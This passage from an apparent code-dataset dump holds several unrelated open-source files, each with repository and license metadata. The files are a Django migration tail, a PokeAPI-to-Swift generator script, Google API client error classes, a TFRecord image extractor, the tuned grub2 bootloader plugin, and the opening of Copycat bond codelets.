'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'unpublished'", 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'subtitle': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Tag']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'photologue.photoeffect': {
'Meta': {'object_name': 'PhotoEffect'},
'background_color': ('django.db.models.fields.CharField', [], {'default': "'#FFFFFF'", 'max_length': '7'}),
'brightness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'color': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'contrast': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'filters': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'reflection_size': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'reflection_strength': ('django.db.models.fields.FloatField', [], {'default': '0.6'}),
'sharpness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'transpose_method': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'})
},
'publisher.publisher': {
'Meta': {'object_name': 'Publisher'},
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'secretballot.vote': {
'Meta': {'unique_together': "(('token', 'content_type', 'object_id'),)", 'object_name': 'Vote'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'vote': ('django.db.models.fields.SmallIntegerField', [], {})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['downloads'] | bsd-3-clause | -4,211,806,556,319,506,000 | 77.719298 | 195 | 0.556464 | false |
dgollub/pokealmanac | scripts/parse_pokeapi.py | 1 | 12145 | #!/usr/bin/env python
# encoding: utf-8
"""
Copyright (c) 2016 by Daniel Kurashige-Gollub <[email protected]>
License MIT: see LICENSE file.
"""
"""
Download the API documentation for the PokeAPI.co site, parse it and
generate Swift structs/classes from it that allow us to easily
use the API in an iOS project.
WARNING: produces un-compilable code and wrong code at the moment.
This is due to the following:
- this code is not optimized/bug free
- the actual API documentation on the PokeAPI.co site has actual errors,
like listing the wrong data type
- the actual API documentation seems to have duplicate "Version"
definitions for the Version endpoint
- need a way to add custom method to the result struct that resolves
NamedAPIResourceList types into a list of the real type
- the PokeAPI documentation lacks information about optional results
i. e. results that can be empty/null
TODO(dkg): also generate SQL statements and Swift methods that allow us
to easily save and load the data gathered from the API on the device
in a SQLite database file.
"""
import os
import codecs
# import shutil
import sys
import traceback
# fix stdout utf-8 decoding/encoding errors
reload(sys)
sys.setdefaultencoding('utf-8')
sys.stdout = codecs.getwriter('utf8')(sys.stdout)
CURRENT_PATH = os.path.dirname(os.path.abspath(__file__))
API_URL = "http://pokeapi.co/docsv2/"
if sys.version_info.major != 2 and sys.version_info.minor != 7:
print "This script was developed with Python 2.7.x and there is no guarantee that it will work with another version."
print "Please uncomment the version check yourself if you want to give it a try."
sys.exit(1)
try:
from bs4 import BeautifulSoup
except ImportError:
print "Please install the Python library BeautifulSoup4 first."
sys.exit(1)
try:
import lxml
except ImportError:
print "Please install the Python lxml library first."
sys.exit(1)
try:
import requests
except ImportError:
print "Please install the Python requests library first."
sys.exit(1)
def download_api_page():
print "Dowloading API documentation from %s" % API_URL
r = requests.get(API_URL)
if r.status_code != 200:
raise Exception("Could not download the Pokemon API site. Please check. Reason: %s" % (str(r.raw.read())))
print "Ok"
return unicode(r.text)
def parse_endpoint(soup, endpoint_id, already_done):
# special cases
# version ==> id is "versions"
if endpoint_id == "version":
endpoint_id = "versions"
header = soup.find("h2", id=endpoint_id)
if header is None:
print "Could not find header for endpoint '%s'!!!" % (endpoint_id)
return (None, False)
model_header = header.find_next_sibling("h4")
# TODO(dkg): example, url and desc are completely wrong at the moment - fix this!
desc_element = header.find_next_sibling("p")
if desc_element is None:
print "No description for %s" % (endpoint_id)
desc = ""
else:
desc = desc_element.text # NOTE(dkg): text loses all inner HTML elements though ... hmmm.
url_element = header.find_next_sibling("h3")
url = url_element.text if url_element is not None else ""
# example_element = header.find_next_sibling("pre")
example = ""
example_element = header.find_previous_sibling("pre")
if example_element is not None:
example_sib = example_element.find_next_sibling("h4")
if example_sib.text == model_header.text:
example = example_element.text if example_element is not None else ""
# print endpoint_id, header
# print desc
# print url
# print example
code = """
//
// %(category)s - %(name)s
// %(url)s
// %(desc)s
//
%(example)s
//
//
public class %(name)s : JSONJoy {
%(variables)s
public required init(_ decoder: JSONDecoder) throws {
%(trycatches)s
}
}"""
# TODO(dkg): what about optional variables????
variable = "public let %(name)s: %(type)s // %(comment)s"
decoder_array = """
guard let tmp%(tmpName)s = decoder["%(name)s"].array else { throw JSONError.WrongType }
var collect%(tmpName)s = [%(type)s]()
for tmpDecoder in tmp%(tmpName)s {
collect%(tmpName)s.append(try %(type)s(tmpDecoder))
}
%(name)s = collect%(tmpName)s
"""
decoder_type = """%(name)s = try %(type)s(decoder["%(name)s"])"""
decoder_var = """%(name)s = try decoder["%(name)s"].%(type)s"""
result = []
# raise Exception("Test")
while model_header is not None and model_header.text not in already_done:
model_table = model_header.find_next_sibling("table")
# print model_header
# print model_table
mt_body = model_table.find("tbody")
mt_rows = mt_body.find_all("tr")
variables = []
trycatches = []
for mt_row in mt_rows:
# print mt_row
columns = mt_row.find_all("td")
varname = columns[0].text
vardesc = columns[1].text
vartype = columns[-1].text
if vartype in ["integer", "string", "boolean"]:
typevar = "Int" if vartype == "integer" else "String" if vartype == "string" else "Bool"
varout = variable % {
"name": varname,
"type": typevar,
"comment": vardesc
}
decodetype = "getInt()" if vartype == "integer" else "getString()" if vartype == "string" else "bool"
decoderout = decoder_var % {
"name": varname,
"type": decodetype
}
elif "list" in vartype:
# example: list <a href="#berryflavormap">BerryFlavorMap</a>
if "integer" in vartype:
typename = "[Int]"
elif "string" in vartype:
typename = "[String]"
else:
anchors = columns[-1].find_all("a")
typename = anchors[-1].text if len(anchors) > 0 else "????"
if len(anchors) == 0:
raise Exception("What is this? %s %s" % (varname, model_header.text))
varout = variable % {
"name": varname,
"type": u"[%s]" % (typename),
"comment": vardesc
}
decoderout = decoder_array % {
"name": varname,
"type": typename,
"tmpName": varname.capitalize(),
}
elif "NamedAPIResource" in vartype:
# TODO(dkg): Need to add additional method that converts the NamedAPIResource URL to it's correct type.
# Example: BerryFirmness here points to a URL, instead of the full JSON for BerryFirmness.
# The struct therefore should provide a method that either returns the cached data or nil
# if no cached data is available. (What about if the actual API didn't provide any data?)
# example: <a href="#namedapiresource">NamedAPIResource</a> (<a href="#berry-firmnesses">BerryFirmness</a>)
typename = columns[-1].find_all("a")[-1].text
varout = variable % {
"name": varname,
"type": typename,
"comment": vardesc
}
decoderout = decoder_type % {
"name": varname,
"type": typename
}
else:
# TODO(dkg): this case emits some wrong code for certain cases - need to fix this
# Just handle this type as its own datatype
varout = variable % {
"name": varname,
"type": vartype,
"comment": vardesc
}
decoderout = decoder_var % {
"name": varname,
"type": vartype
}
# raise Exception("Variable '%s' datatype not handled: %s" % (varname, vartype))
variables.append(varout)
trycatches.append(decoderout)
# print varname, vardesc, vartype, varout
# return
tmp = code % {
"category": header.text,
"name": model_header.text.replace(" ", ""),
"desc": desc,
"url": url,
"example": u"\n".join(map(lambda line: u"// %s" % line, example.split("\n"))),
"variables": (u"\n%s" % (u" " * 4)).join(variables),
"trycatches": (u"\n%s" % (u" " * 8)).join(trycatches),
}
result.append(tmp)
already_done.append(model_header.text)
# get the next response model
model_header = model_header.find_next_sibling("h4")
# print "next model_header", model_header
# check if the next header belongs to a different endpoint
if model_header is not None and endpoint_id not in ["common-models", "resource-lists"]:
parent_header = model_header.find_previous_sibling("h2")
# print 'parent_header["id"]', endpoint_id, parent_header["id"]
if endpoint_id != parent_header["id"][1:]:
model_header = None
return ("\n".join(result), True)
def parse_api(api_data):
print "Gonna parse the data now ..."
soup = BeautifulSoup(api_data, "lxml")
# head_element = soup.find(id="pokeapi-v2-api-reference")
# nav_table = head_element.find_next_sibling("table")
# lists = nav_table.find_all("ul")
div = soup.find("div", class_="doc-select")
lists = filter(lambda l: len(l.attrs.keys()) == 0, div.find_all("li"))
api_endpoint_ids = []
for l in lists:
endpoint_id = l.a["href"]
if endpoint_id in ["#wrap", "#info"]:
continue
api_endpoint_ids.append(endpoint_id)
print api_endpoint_ids
already_done = []
result = []
for endpoint in api_endpoint_ids:
parsed_data, found = parse_endpoint(soup, endpoint[1:], already_done) # remove # char from the id
if found:
result.append(parsed_data)
return "\n".join(result)
def main():
print "Go!"
folder = os.path.join(CURRENT_PATH, "pokeapi.co")
if not os.path.exists(folder):
os.makedirs(folder)
api_file_name = os.path.join(folder, "api.html")
download_api = True
ask = "dontask" not in sys.argv
if os.path.exists(api_file_name):
if ask:
user_input = (raw_input("A local copy of the API site exists already. Do you want to download it anyway and overwrite the local copy? yes/[no]: ") or "").strip().lower()[:1]
download_api = user_input in ["y", "j"]
else:
download_api = False
if download_api:
api_site_data = download_api_page()
with codecs.open(api_file_name, "w", "utf-8") as f:
f.write(api_site_data)
else:
with codecs.open(api_file_name, "r", "utf-8") as f:
api_site_data = f.read()
parsed_api = parse_api(api_site_data)
if len(parsed_api) > 0:
# print parsed_api # TODO(dkg): write to a file
output_file = os.path.join(folder, "pokeapi-generated.swift")
with codecs.open(output_file, "w", "utf-8") as f:
f.write("//\n// This file was generated by a Python script.\n// DO NOT USE THIS CODE DIRECTLY! IT DOES NOT COMPILE!\n//\n\n")
f.write("//\n// There are documentation errors in the API, so some types are wrong.\n// Double check everything before ")
f.write("using any of this generated code.\n// DO NOT USE THIS CODE DIRECTLY! IT DOES NOT COMPILE!\n//\n\n")
f.write(parsed_api)
f.write("\n")
print "Wrote %s" % (output_file)
print "Done."
try:
main()
except Exception as ex:
print "Something went wrong. Oops."
print ex
traceback.print_exc(file=sys.stdout)
| mit | 4,508,636,457,054,790,700 | 36.140673 | 185 | 0.573322 | false |
kartikluke/yotube | googleapiclient/errors.py | 1 | 3516 | #!/usr/bin/python2.4
#
# Copyright (C) 2014 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Errors for the library.
All exceptions defined by the library
should be defined in this file.
"""
__author__ = '[email protected] (Joe Gregorio)'
from oauth2client import util
from oauth2client.anyjson import simplejson
class Error(Exception):
"""Base error for this module."""
pass
class HttpError(Error):
"""HTTP data was invalid or unexpected."""
@util.positional(3)
def __init__(self, resp, content, uri=None):
self.resp = resp
self.content = content
self.uri = uri
def _get_reason(self):
"""Calculate the reason for the error from the response content."""
reason = self.resp.reason
try:
data = simplejson.loads(self.content)
reason = data['error']['message']
except (ValueError, KeyError):
pass
if reason is None:
reason = ''
return reason
def __repr__(self):
if self.uri:
return '<HttpError %s when requesting %s returned "%s">' % (
self.resp.status, self.uri, self._get_reason().strip())
else:
return '<HttpError %s "%s">' % (self.resp.status, self._get_reason())
__str__ = __repr__
class InvalidJsonError(Error):
"""The JSON returned could not be parsed."""
pass
class UnknownFileType(Error):
"""File type unknown or unexpected."""
pass
class UnknownLinkType(Error):
"""Link type unknown or unexpected."""
pass
class UnknownApiNameOrVersion(Error):
"""No API with that name and version exists."""
pass
class UnacceptableMimeTypeError(Error):
"""That is an unacceptable mimetype for this operation."""
pass
class MediaUploadSizeError(Error):
"""Media is larger than the method can accept."""
pass
class ResumableUploadError(HttpError):
"""Error occured during resumable upload."""
pass
class InvalidChunkSizeError(Error):
"""The given chunksize is not valid."""
pass
class InvalidNotificationError(Error):
"""The channel Notification is invalid."""
pass
class BatchError(HttpError):
"""Error occured during batch operations."""
@util.positional(2)
def __init__(self, reason, resp=None, content=None):
self.resp = resp
self.content = content
self.reason = reason
def __repr__(self):
return '<BatchError %s "%s">' % (self.resp.status, self.reason)
__str__ = __repr__
class UnexpectedMethodError(Error):
"""Exception raised by RequestMockBuilder on unexpected calls."""
@util.positional(1)
def __init__(self, methodId=None):
"""Constructor for an UnexpectedMethodError."""
super(UnexpectedMethodError, self).__init__(
'Received unexpected call %s' % methodId)
class UnexpectedBodyError(Error):
"""Exception raised by RequestMockBuilder on unexpected bodies."""
def __init__(self, expected, provided):
"""Constructor for an UnexpectedMethodError."""
super(UnexpectedBodyError, self).__init__(
'Expected: [%s] - Provided: [%s]' % (expected, provided))
| mit | -440,186,985,566,424,600 | 24.114286 | 75 | 0.685438 | false |
Bartzi/stn-ocr | datasets/fsns/tfrecord_utils/tfrecord_to_image.py | 1 | 2073 | import argparse
import csv
import os
import re
import numpy as np
import tensorflow as tf
from PIL import Image
FILENAME_PATTERN = re.compile(r'.+-(\d+)-of-(\d+)')
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='tool that takes tfrecord files and extracts all images + labels from it')
parser.add_argument('tfrecord_dir', help='path to directory containing tfrecord files')
parser.add_argument('destination_dir', help='path to dir where resulting images shall be saved')
parser.add_argument('stage', help='stage of training these files are for [e.g. train]')
args = parser.parse_args()
tfrecord_files = os.listdir(args.tfrecord_dir)
tfrecord_files = sorted(tfrecord_files, key=lambda x: int(FILENAME_PATTERN.match(x).group(1)))
with open(os.path.join(args.destination_dir, '{}.csv'.format(args.stage)), 'w') as label_file:
writer = csv.writer(label_file, delimiter='\t')
for tfrecord_file in tfrecord_files:
tfrecord_filename = os.path.join(args.tfrecord_dir, tfrecord_file)
file_id = FILENAME_PATTERN.match(tfrecord_file).group(1)
dest_dir = os.path.join(args.destination_dir, args.stage, file_id)
os.makedirs(dest_dir, exist_ok=True)
record_iterator = tf.python_io.tf_record_iterator(path=tfrecord_filename)
for idx, string_record in enumerate(record_iterator):
example = tf.train.Example()
example.ParseFromString(string_record)
labels = example.features.feature['image/class'].int64_list.value
img_string = example.features.feature['image/encoded'].bytes_list.value[0]
file_name = os.path.join(dest_dir, '{}.png'.format(idx))
with open(file_name, 'wb') as f:
f.write(img_string)
label_file_data = [file_name]
label_file_data.extend(labels)
writer.writerow(label_file_data)
print("recovered {:0>6} files".format(idx), end='\r')
| gpl-3.0 | -3,318,274,954,810,785,300 | 38.113208 | 123 | 0.636276 | false |
olysonek/tuned | tuned/plugins/plugin_bootloader.py | 1 | 12902 | from . import base
from .decorators import *
import tuned.logs
from . import exceptions
from tuned.utils.commands import commands
import tuned.consts as consts
import os
import re
import tempfile
log = tuned.logs.get()
class BootloaderPlugin(base.Plugin):
"""
Plugin for tuning bootloader options.
Currently only grub2 is supported and reboot is required to apply the tunings.
These tunings are unloaded only on profile change followed by reboot.
"""
def __init__(self, *args, **kwargs):
if not os.path.isfile(consts.GRUB2_TUNED_TEMPLATE_PATH):
raise exceptions.NotSupportedPluginException("Required GRUB2 template not found, disabling plugin.")
super(BootloaderPlugin, self).__init__(*args, **kwargs)
self._cmd = commands()
def _instance_init(self, instance):
instance._has_dynamic_tuning = False
instance._has_static_tuning = True
# controls grub2_cfg rewrites in _instance_post_static
self.update_grub2_cfg = False
self._initrd_remove_dir = False
self._initrd_dst_img_val = None
self._cmdline_val = ""
self._initrd_val = ""
self._grub2_cfg_file_names = self._get_grub2_cfg_files()
def _instance_cleanup(self, instance):
pass
@classmethod
def _get_config_options(cls):
return {
"grub2_cfg_file": None,
"initrd_dst_img": None,
"initrd_add_img": None,
"initrd_add_dir": None,
"initrd_remove_dir": None,
"cmdline": None,
}
def _get_effective_options(self, options):
"""Merge provided options with plugin default options and merge all cmdline.* options."""
effective = self._get_config_options().copy()
cmdline_keys = []
for key in options:
if str(key).startswith("cmdline"):
cmdline_keys.append(key)
elif key in effective:
effective[key] = options[key]
else:
log.warn("Unknown option '%s' for plugin '%s'." % (key, self.__class__.__name__))
cmdline_keys.sort()
cmdline = ""
for key in cmdline_keys:
val = options[key]
if val is None or val == "":
continue
op = val[0]
vals = val[1:].strip()
if op == "+" and vals != "":
cmdline += " " + vals
elif op == "-" and vals != "":
for p in vals.split():
regex = re.escape(p)
cmdline = re.sub(r"(\A|\s)" + regex + r"(?=\Z|\s)", r"", cmdline)
else:
cmdline += " " + val
cmdline = cmdline.strip()
if cmdline != "":
effective["cmdline"] = cmdline
return effective
def _get_grub2_cfg_files(self):
cfg_files = []
for f in consts.GRUB2_CFG_FILES:
if os.path.exists(f):
cfg_files.append(f)
return cfg_files
def _patch_bootcmdline(self, d):
return self._cmd.add_modify_option_in_file(consts.BOOT_CMDLINE_FILE, d)
def _remove_grub2_tuning(self):
if not self._grub2_cfg_file_names:
log.info("cannot find grub.cfg to patch")
return
self._patch_bootcmdline({consts.BOOT_CMDLINE_TUNED_VAR : "", consts.BOOT_CMDLINE_INITRD_ADD_VAR : ""})
for f in self._grub2_cfg_file_names:
self._cmd.add_modify_option_in_file(f, {"set\s+" + consts.GRUB2_TUNED_VAR : "", "set\s+" + consts.GRUB2_TUNED_INITRD_VAR : ""}, add = False)
if self._initrd_dst_img_val is not None:
log.info("removing initrd image '%s'" % self._initrd_dst_img_val)
self._cmd.unlink(self._initrd_dst_img_val)
def _instance_unapply_static(self, instance, full_rollback = False):
if full_rollback:
log.info("removing grub2 tuning previously added by Tuned")
self._remove_grub2_tuning()
self._update_grubenv({"tuned_params" : "", "tuned_initrd" : ""})
def _grub2_cfg_unpatch(self, grub2_cfg):
log.debug("unpatching grub.cfg")
cfg = re.sub(r"^\s*set\s+" + consts.GRUB2_TUNED_VAR + "\s*=.*\n", "", grub2_cfg, flags = re.MULTILINE)
grub2_cfg = re.sub(r" *\$" + consts.GRUB2_TUNED_VAR, "", cfg, flags = re.MULTILINE)
cfg = re.sub(r"^\s*set\s+" + consts.GRUB2_TUNED_INITRD_VAR + "\s*=.*\n", "", grub2_cfg, flags = re.MULTILINE)
grub2_cfg = re.sub(r" *\$" + consts.GRUB2_TUNED_INITRD_VAR, "", cfg, flags = re.MULTILINE)
cfg = re.sub(consts.GRUB2_TEMPLATE_HEADER_BEGIN + r"\n", "", grub2_cfg, flags = re.MULTILINE)
return re.sub(consts.GRUB2_TEMPLATE_HEADER_END + r"\n+", "", cfg, flags = re.MULTILINE)
def _grub2_cfg_patch_initial(self, grub2_cfg, d):
log.debug("initial patching of grub.cfg")
s = r"\1\n\n" + consts.GRUB2_TEMPLATE_HEADER_BEGIN + "\n"
for opt in d:
s += r"set " + self._cmd.escape(opt) + "=\"" + self._cmd.escape(d[opt]) + "\"\n"
s += consts.GRUB2_TEMPLATE_HEADER_END + r"\n"
grub2_cfg = re.sub(r"^(\s*###\s+END\s+[^#]+/00_header\s+### *)\n", s, grub2_cfg, flags = re.MULTILINE)
d2 = {"linux" : consts.GRUB2_TUNED_VAR, "initrd" : consts.GRUB2_TUNED_INITRD_VAR}
for i in d2:
# add tuned parameters to all kernels
grub2_cfg = re.sub(r"^(\s*" + i + r"(16|efi)?\s+.*)$", r"\1 $" + d2[i], grub2_cfg, flags = re.MULTILINE)
# remove tuned parameters from rescue kernels
grub2_cfg = re.sub(r"^(\s*" + i + r"(?:16|efi)?\s+\S+rescue.*)\$" + d2[i] + r" *(.*)$", r"\1\2", grub2_cfg, flags = re.MULTILINE)
# fix whitespaces in rescue kernels
grub2_cfg = re.sub(r"^(\s*" + i + r"(?:16|efi)?\s+\S+rescue.*) +$", r"\1", grub2_cfg, flags = re.MULTILINE)
return grub2_cfg
def _grub2_default_env_patch(self):
grub2_default_env = self._cmd.read_file(consts.GRUB2_DEFAULT_ENV_FILE)
if len(grub2_default_env) <= 0:
log.info("cannot read '%s'" % consts.GRUB2_DEFAULT_ENV_FILE)
return False
d = {"GRUB_CMDLINE_LINUX_DEFAULT" : consts.GRUB2_TUNED_VAR, "GRUB_INITRD_OVERLAY" : consts.GRUB2_TUNED_INITRD_VAR}
write = False
for i in d:
if re.search(r"^[^#]*\b" + i + r"\s*=.*\\\$" + d[i] + r"\b.*$", grub2_default_env, flags = re.MULTILINE) is None:
write = True
if grub2_default_env[-1] != "\n":
grub2_default_env += "\n"
grub2_default_env += i + "=\"${" + i + ":+$" + i + r" }\$" + d[i] + "\"\n"
if write:
log.debug("patching '%s'" % consts.GRUB2_DEFAULT_ENV_FILE)
self._cmd.write_to_file(consts.GRUB2_DEFAULT_ENV_FILE, grub2_default_env)
return True
def _grub2_cfg_patch(self, d):
log.debug("patching grub.cfg")
if not self._grub2_cfg_file_names:
log.info("cannot find grub.cfg to patch")
return False
for f in self._grub2_cfg_file_names:
grub2_cfg = self._cmd.read_file(f)
if len(grub2_cfg) <= 0:
log.info("cannot patch %s" % f)
continue
log.debug("adding boot command line parameters to '%s'" % f)
grub2_cfg_new = grub2_cfg
patch_initial = False
for opt in d:
(grub2_cfg_new, nsubs) = re.subn(r"\b(set\s+" + opt + "\s*=).*$", r"\1" + "\"" + d[opt] + "\"", grub2_cfg_new, flags = re.MULTILINE)
if nsubs < 1 or re.search(r"\$" + opt, grub2_cfg, flags = re.MULTILINE) is None:
patch_initial = True
# workaround for rhbz#1442117
if len(re.findall(r"\$" + consts.GRUB2_TUNED_VAR, grub2_cfg, flags = re.MULTILINE)) != \
len(re.findall(r"\$" + consts.GRUB2_TUNED_INITRD_VAR, grub2_cfg, flags = re.MULTILINE)):
patch_initial = True
if patch_initial:
grub2_cfg_new = self._grub2_cfg_patch_initial(self._grub2_cfg_unpatch(grub2_cfg), d)
self._cmd.write_to_file(f, grub2_cfg_new)
self._grub2_default_env_patch()
return True
def _grub2_update(self):
self._grub2_cfg_patch({consts.GRUB2_TUNED_VAR : self._cmdline_val, consts.GRUB2_TUNED_INITRD_VAR : self._initrd_val})
self._patch_bootcmdline({consts.BOOT_CMDLINE_TUNED_VAR : self._cmdline_val, consts.BOOT_CMDLINE_INITRD_ADD_VAR : self._initrd_val})
def _has_bls(self):
return os.path.exists(consts.BLS_ENTRIES_PATH)
def _update_grubenv(self, d):
log.debug("updating grubenv, setting %s" % str(d));
l = ["%s=%s" % (str(option), str(value)) for option, value in d.items()]
(rc, out) = self._cmd.execute(["grub2-editenv", "-", "set"] + l)
if rc != 0:
log.warn("cannot update grubenv: '%s'" % out)
return False;
return True
def _bls_entries_patch_initial(self):
machine_id = self._cmd.get_machine_id()
if machine_id == "":
return False
log.debug("running kernel update hook '%s' to patch BLS entries" % consts.KERNEL_UPDATE_HOOK_FILE)
(rc, out) = self._cmd.execute([consts.KERNEL_UPDATE_HOOK_FILE, "add"], env = {"KERNEL_INSTALL_MACHINE_ID" : machine_id})
if rc != 0:
log.warn("cannot patch BLS entries: '%s'" % out)
return False
return True
def _bls_update(self):
log.debug("updating BLS")
if self._has_bls() and \
self._update_grubenv({"tuned_params" : self._cmdline_val, "tuned_initrd" : self._initrd_val}) and \
self._bls_entries_patch_initial():
return True
return False
def _init_initrd_dst_img(self, name):
if self._initrd_dst_img_val is None:
self._initrd_dst_img_val = os.path.join(consts.BOOT_DIR, os.path.basename(name))
def _check_petitboot(self):
return os.path.isdir(consts.PETITBOOT_DETECT_DIR)
def _install_initrd(self, img):
if self._check_petitboot():
log.warn("Detected Petitboot which doesn't support initrd overlays. The initrd overlay will be ignored by bootloader.")
log.info("installing initrd image as '%s'" % self._initrd_dst_img_val)
img_name = os.path.basename(self._initrd_dst_img_val)
if not self._cmd.copy(img, self._initrd_dst_img_val):
return False
self.update_grub2_cfg = True
curr_cmdline = self._cmd.read_file("/proc/cmdline").rstrip()
initrd_grubpath = "/"
lc = len(curr_cmdline)
if lc:
path = re.sub(r"^\s*BOOT_IMAGE=\s*(\S*/).*$", "\\1", curr_cmdline)
if len(path) < lc:
initrd_grubpath = path
self._initrd_val = os.path.join(initrd_grubpath, img_name)
return True
@command_custom("grub2_cfg_file")
def _grub2_cfg_file(self, enabling, value, verify, ignore_missing):
# nothing to verify
if verify:
return None
if enabling and value is not None:
self._grub2_cfg_file_names = [str(value)]
@command_custom("initrd_dst_img")
def _initrd_dst_img(self, enabling, value, verify, ignore_missing):
# nothing to verify
if verify:
return None
if enabling and value is not None:
self._initrd_dst_img_val = str(value)
if self._initrd_dst_img_val == "":
return False
if self._initrd_dst_img_val[0] != "/":
self._initrd_dst_img_val = os.path.join(consts.BOOT_DIR, self._initrd_dst_img_val)
@command_custom("initrd_remove_dir")
def _initrd_remove_dir(self, enabling, value, verify, ignore_missing):
# nothing to verify
if verify:
return None
if enabling and value is not None:
self._initrd_remove_dir = self._cmd.get_bool(value) == "1"
@command_custom("initrd_add_img", per_device = False, priority = 10)
def _initrd_add_img(self, enabling, value, verify, ignore_missing):
# nothing to verify
if verify:
return None
if enabling and value is not None:
src_img = str(value)
self._init_initrd_dst_img(src_img)
if src_img == "":
return False
if not self._install_initrd(src_img):
return False
@command_custom("initrd_add_dir", per_device = False, priority = 10)
def _initrd_add_dir(self, enabling, value, verify, ignore_missing):
# nothing to verify
if verify:
return None
if enabling and value is not None:
src_dir = str(value)
self._init_initrd_dst_img(src_dir)
if src_dir == "":
return False
if not os.path.isdir(src_dir):
log.error("error: cannot create initrd image, source directory '%s' doesn't exist" % src_dir)
return False
log.info("generating initrd image from directory '%s'" % src_dir)
(fd, tmpfile) = tempfile.mkstemp(prefix = "tuned-bootloader-", suffix = ".tmp")
log.debug("writing initrd image to temporary file '%s'" % tmpfile)
os.close(fd)
(rc, out) = self._cmd.execute("find . | cpio -co > %s" % tmpfile, cwd = src_dir, shell = True)
log.debug("cpio log: %s" % out)
if rc != 0:
log.error("error generating initrd image")
self._cmd.unlink(tmpfile, no_error = True)
return False
self._install_initrd(tmpfile)
self._cmd.unlink(tmpfile)
if self._initrd_remove_dir:
log.info("removing directory '%s'" % src_dir)
self._cmd.rmtree(src_dir)
@command_custom("cmdline", per_device = False, priority = 10)
def _cmdline(self, enabling, value, verify, ignore_missing):
v = self._variables.expand(self._cmd.unquote(value))
if verify:
cmdline = self._cmd.read_file("/proc/cmdline")
if len(cmdline) == 0:
return None
cmdline_set = set(cmdline.split())
value_set = set(v.split())
cmdline_intersect = cmdline_set.intersection(value_set)
if cmdline_intersect == value_set:
log.info(consts.STR_VERIFY_PROFILE_VALUE_OK % ("cmdline", str(value_set)))
return True
else:
log.error(consts.STR_VERIFY_PROFILE_VALUE_FAIL % ("cmdline", str(cmdline_intersect), str(value_set)))
return False
if enabling and value is not None:
log.info("installing additional boot command line parameters to grub2")
self.update_grub2_cfg = True
self._cmdline_val = v
def _instance_post_static(self, instance, enabling):
if enabling and self.update_grub2_cfg:
self._grub2_update()
self._bls_update()
self.update_grub2_cfg = False
| gpl-2.0 | -48,616,862,515,739,710 | 36.61516 | 143 | 0.654782 | false |
ajhager/copycat | copycat/coderack/codelets/bond.py | 1 | 10023 | # Copyright (c) 2007-2017 Joseph Hager.
#
# Copycat is free software; you can redistribute it and/or modify
# it under the terms of version 2 of the GNU General Public License,
# as published by the Free Software Foundation.
#
# Copycat is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Copycat; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""Bond Codelets"""
import copycat.toolbox as toolbox
from copycat.coderack import Codelet
class BondBottomUpScout(Codelet):
"""Choose an object and a neighbor of that object probabilistically by
intra string salience. Choose a bond facet probabilistically by
relevance in the string. Check if there is a bond between the two
descriptors of this facet. Post a bond strength tester codelet with
urgency a function of the degree of association of bonds of the bond
category."""
structure_category = 'bond'
def run(self, coderack, slipnet, workspace):
from_object = workspace.choose_object('intra_string_salience')
to_object = from_object.choose_neighbor()
if not to_object:
return # Fizzle
bond_facet = workspace.choose_bond_facet(from_object, to_object)
if not bond_facet:
return # Fizzle
from_descriptor = from_object.get_descriptor(bond_facet)
to_descriptor = to_object.get_descriptor(bond_facet)
if not from_descriptor or not to_descriptor:
return # Fizzle
bond_category = slipnet.get_bond_category(from_descriptor, to_descriptor)
if not bond_category:
return # Fizzle
return workspace.propose_bond(from_object, to_object, bond_category,
bond_facet, from_descriptor, to_descriptor)
class BondBuilder(Codelet):
"""Attempt to build the proposed bond, fighting with any competitiors."""
structure_category = 'bond'
